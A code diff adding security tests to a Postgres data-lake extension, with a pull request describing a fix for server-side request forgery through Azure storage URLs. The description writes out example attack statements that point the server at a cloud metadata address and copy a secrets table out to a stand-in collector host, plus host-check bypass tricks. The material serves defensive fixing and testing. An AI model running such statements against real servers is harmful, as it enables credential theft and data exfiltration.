+        "sec_test/azure_data_file_manifest_list.avro",
+        lambda record: record.update({"manifest_path": manifest_url}),
+    )
+    metadata_url = upload_metadata_with_manifest_list(
+        s3,
+        "sec_test/azure_data_file_metadata.json",
+        manifest_list_url,
+    )
+
+    error = run_command(
+        f"SELECT * FROM lake_iceberg.files('{metadata_url}')",
+        pg_conn,
+        raise_error=False,
+    )
+    pg_conn.rollback()
+
+    assert "not permitted" in str(error).lower(), error
 
 
 def test_data_file_local_path_in_manifest_is_rejected(pg_conn, superuser_conn, s3):

--- a/pg_lake_iceberg/tests/pytests/test_security.py
+++ b/pg_lake_iceberg/tests/pytests/test_security.py
@@ -389,6 +389,44 @@ def test_nested_azure_data_file_host_is_rejected(pg_conn, s3, extension):
     assert "not permitted" in str(error).lower(), error
 
 
+def test_manifest_url_check_does_not_require_lake_read(
+    pg_conn, superuser_conn, s3, extension
+):
+    """
+    Rewriting a snapshot reads a manifest pg_lake wrote itself, so validating
+    those URLs must not turn into a lake_read check.  Every other fixture here
+    holds lake_read_write, which would hide that.
+    """
+    reader_role = "manifest_reader_without_lake_read"
+
+    run_command(f"DROP ROLE IF EXISTS {reader_role}", superuser_conn)
+    run_command(f"CREATE USER {reader_role}", superuser_conn)
+    superuser_conn.commit()
+
+    run_command(
+        f"SET pg_lake_iceberg.default_location_prefix TO 's3://{TEST_BUCKET}'", pg_conn
+    )
+    run_command("CREATE TABLE lake_read_free (id int) USING iceberg", pg_conn)
+    run_command("INSERT INTO lake_read_free VALUES (1), (2)", pg_conn)
+    run_command(f"GRANT SELECT, DELETE ON lake_read_free TO {reader_role}", pg_conn)
+    pg_conn.commit()
+
+    reader_conn = open_pg_conn(user=reader_role)
+
+    try:
+        run_command("DELETE FROM lake_read_free WHERE id = 1", reader_conn)
+        reader_conn.commit()
+
+        remaining = run_query("SELECT count(*) FROM lake_read_free", reader_conn)
+        assert remaining[0][0] == 1
+    finally:
+        reader_conn.close()
+        run_command("DROP TABLE lake_read_free", pg_conn)
+        pg_conn.commit()
+        run_command(f"DROP ROLE {reader_role}", superuser_conn)
+        superuser_conn.commit()
+
+
 def test_data_file_local_path_in_manifest_is_rejected(pg_conn, superuser_conn, s3):
     """
     Regression test for: second-order URI in data_file.file_path -> DuckDB


### PR DESCRIPTION
## Problem

`CheckUserSuppliedURL()` rejects DuckDB query parameters that are not on a small allowlist, which closes the endpoint override that arrives in a URL query string:

```sql
COPY t FROM 's3://bucket/key?s3_endpoint=169.254.169.254&s3_use_ssl=false';  -- rejected
```

The Azure schemes do not need a query string, because they carry the storage endpoint in the URL host:

```
abfss://<container>@<account>.<endpoint>/<path>
az://<account>.<endpoint>/<container>/<path>
azure://<account>.<endpoint>/<container>/<path>
```

DuckDB's azure filesystem builds its request target as `https://<account>.<endpoint>`, taking both halves from the URL, so a user who can supply a URL could point the server at any reachable host and read the response back as query rows, or write query output to it:

```sql
COPY t FROM 'abfss://c@169.254.169.254/latest/meta-data/' WITH (format 'csv');
COPY (SELECT * FROM secrets) TO 'abfss://c@collector.internal/out.csv' WITH (format 'csv');
```

The reachable entry points are every caller of the URL checks: `COPY ... FROM/TO`, the `lake_file` functions, the `path` and `location` options of a foreign table, `CREATE TABLE ... WITH (load_from = ...)`, and Iceberg table locations. A `NOTE:` in `roles.c` already recorded the gap.

## Solution

Add `CheckAzureURLHost()` to `CheckUserSuppliedURL()`, so it applies at the same chokepoint every caller already goes through.

- A URL that names no endpoint is unchanged. With no dot in the host, DuckDB takes the account and the endpoint from an Azure secret, which only an admin can create, so `az://<container>/<path>` (the form every Azure test and every documented example uses) still works.
- A URL that names a host has to sit under one of the suffixes in the new `pg_lake.allowed_azure_host_suffixes`. The default covers the dfs and blob endpoints of the public, US Government and China clouds. The setting is `PGC_SUSET`, so a role that can supply URLs cannot widen it, and an admin running against a private or sovereign endpoint can.
- The suffix match falls on a label boundary and has to leave at least one character of account name, so neither `evilblob.core.windows.net` nor a bare `blob.core.windows.net` passes for `.blob.core.windows.net`.
- A dot or a second `@` in the container part is rejected as malformed. DuckDB's parser splits the authority differently on those inputs (`abfss://c.d@internal-service/x` reaches a single label host, and a second `@` turns the allowed suffix into URL userinfo), which is another way to reach a host the suffix check would otherwise reject.
- The setting has a check hook, so a list that does not parse is rejected at `SET` time. Without one the `SET` succeeds and every Azure URL then fails later, inside the host check, which is a confusing place to read a misconfiguration from.

`gs://` and `gcs://` do not need the same treatment. There the URL host is the bucket, and `s3fs.cpp` forces the endpoint to `storage.googleapis.com` unless it was overridden from a secret specifically, so a URL cannot move the request. The `s3_endpoint` query parameter, which is the only URL level override, is already rejected.

## Test plan

New cases in `pg_lake_copy/tests/pytests/test_security.py`, beside the existing query-parameter regression tests:

- eight rejected URLs (IP literal host, internal name, suffix-lookalike hosts, userinfo smuggling, `az://` and `azure://` with a fully qualified account, dotted container), each on the read path and on the write path
- the same URL rejected through a foreign table `path` option
- a host under an allowed suffix must get past the URL check and fail later, in the storage client
- `az://<container>/<path>` still round-trips through the Azure test server
- a non-superuser cannot `SET pg_lake.allowed_azure_host_suffixes`
- adding a suffix makes the previously rejected URL pass the URL check
- a malformed suffix list is rejected at `SET` time and leaves the previous list in place

`test_security.py` is green (35 passed), pgindent and black are clean. The check-hook case was sentinelled: with the hook unwired the malformed `SET` succeeds and the test fails.
